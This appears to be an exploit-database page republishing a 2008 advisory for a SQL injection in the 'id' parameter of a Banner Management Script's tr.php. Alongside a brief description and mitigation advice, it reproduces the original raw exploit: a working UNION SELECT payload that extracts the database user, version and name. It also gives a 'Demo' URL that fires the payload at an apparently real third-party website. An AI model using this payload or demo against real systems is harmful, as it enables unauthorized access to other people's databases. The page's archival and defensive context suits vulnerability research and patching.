header-logo
Suggest Exploit
vendor:
Banner Management Script
by:
Hussin X
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Banner Management Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Banner Management (id) Remote SQL Injection Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'id' parameter to the 'tr.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation may allow execution of arbitrary SQL commands and compromise the application, its data and the underlying system.

Mitigation:

Input validation should be used to prevent SQL injection attacks. It is also recommended to use parameterized queries instead of dynamic queries.
Source

Exploit-DB raw data:

 Banner Management (id) Remote SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home :  www.IQ-TY.com  & www.TrYaG.cc

___________________________________

script    : http://www.yourfreeworld.com/script/bannermanagementscript.asp

DorK   : :)

Exploit :
_______

tr.php?id=-1+union+select+1,2,3,concat(user(),version(),database()),5,6,7,8,9,10,11,12,13--


Demo :
_______

http://www.downlinegoldmine.com/bannermanagerpro/tr.php?id=-1+union+select+1,2,3,concat(user(),version(),database()),5,6,7,8,9,10,11,12,13--




Greetz : All my freind

# milw0rm.com [2008-11-01]

Navigation

Suggest Exploit

Services By CQR